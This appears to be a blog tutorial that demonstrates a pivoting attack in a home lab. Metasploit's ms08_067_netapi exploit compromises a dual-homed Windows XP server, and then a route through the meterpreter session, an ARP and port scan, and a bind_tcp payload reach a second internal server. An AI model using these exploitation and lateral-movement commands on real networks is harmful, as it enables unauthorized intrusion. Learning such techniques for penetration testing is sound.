How to do Pivoting Attack

scenario_pivoting.jpg

Hello guys in this tutorial you will learn how a attacker use victim as a Pivot to hack deeper into the network. In this scenario you will see that the Attacker does not have direct access to Server 2. So here you will see how the attacker first breaks into server 1 and then uses server 1 as a staging point to break the server 2.  Now let me give a Sample scenario what i mean…

Pivoting Attack :

1.jpg

So lets say the attacker wants to break a network which has a DMG in which there is a server  1 which he can access and then behind the 2nd Firewall we have Server 2 which the attacker actually wants to access, this may be E-mail server or something or the others. Now the only ways the attacker to access the server 2 is first he first to break into the server 1 and then use as a staging point to break into server 2. This process is actually called as Pivoting and the Server 1 use as a Pivot into the rest of the network.

Now Let me show you Demonstration that how Pivoting works with Metasploit.

Untitled-2 copy.jpg

 

Here is the Scenario which is use to break in. Here above Scenario the attacker has a addressable ip 192.168.1.10 with which he can access Server 1 which is at 192.168.1.100 . Server 1 has multi home and has another IP 10.10.10.10 which is connected to server 2 at 10.10.10.20. Here the whole idea of the attacker is to first break in server 1 and create a Pivot and to allow the attacker to channelized all his attack traffic to Server 2 and then finally breaking into Server 2.

Now now look at our Network which is I created on my VM ware.

Untitled-3 copy.jpg

Untitled-4 copy.jpg

 

This is Server 1 which is multi homed and has 2 Interfaces. And then on other side this is Server 2 which has only 1 Interface and has the ip 10.10.10.20

Step 1:-  So now what we are going to do is First break into server 1 which has the addressable ip to the attacker 192.168.1.100 using netapi exploit.

So here we first open msfconsole and then set remote host IP means the server 1 IP and exploit it.

Use exploit/windows/smb/ms08_067_netapi

Set RHOST 192.168.1.100

exploit

Untitled-5 copy.jpg

Step 2:- Now we successfully find the meterpreter session of server 1 . Now we run a ifconfig command to understand more about the local Interfaces. How ever there seem to be an additional interface having Ip all 10’s 10.10.10.10

ipconfig

Untitled-6 copy.jpg

Step 3 :- Now the we want to do is first you check even any host is running on 10.10.10.10 sub net. To do that we will run a meterpreter script arp_scanner

run arp_scanner  -r 10.10.10.10/24

Untitled-7 copy.jpg

Now it immediately tells that the ip 10.10.10.20 on that sub net. So in next step we do a port scan .

Step 4 :-  How ever the problem really is the attacker computer we can’t reach that network. So now what we are going to do is we create a Pivot and to do that we use a route command in metasploit. So what will the rout command to do to tell metasploit to rout all traffic to the 10.10.10.10 network vie the meterpreter session 1 which we have currently with server 1.

route add 10.10.10.10 255.255.255.0 1  (1 is a meterpreter session id)

Untitled-8 copy.jpg

And now using session command to check the which session we have on server 1.

Sessions  –l

Step 5 :- so now what we have to do we first to do a port scan on a remote machine and then set Rhost so in this case it will 10.10.10.20 which is the final victim and the port we are interested in 1-200. Now then run the auxiliary module using run command.

Use auxiliary/scanner/portscan/tcp

Set RHOST 10.10.10.20

Set PORTS 1-200

run

Untitled-9 copy.jpg

After running auxiliary module all of this traffic is going through the pivot point. Now find a couple of ports open.

Step 6:- Now we use the netapi exploit  on the remote machine  via the pivot point.

So basically what we do we use a server 1 as a intermediate to break into server 2. Now search netapi module using search command.

Serach netapi

Use exploit/windows/smb/ms08_067_netapi

Set RHOST 10.10.10.20

Set PAYLOAD windows/meterpreter/bind_tcp

exploit

Untitled-10 copy.jpg

Untitled-11 copy.jpg

So now we are exploiting 10.10.10.20 via the pivot running on 192.168.1.100 and there we go we find meterprete session open and if we run the ifconfig command we note that we have broken into the 10.10.10.20 network . And this clearly said this can happened via the pivot running on 192.168.1.100.

 

Note :- Here I am using netapi exploit to exploit the servers which is windows xp. Netapi only works with windows xp it can’t able to exploit windows 7 and 8. And here we also turn off the Firewall of the windows.

Leave a Reply

Your email address will not be published. Required fields are marked *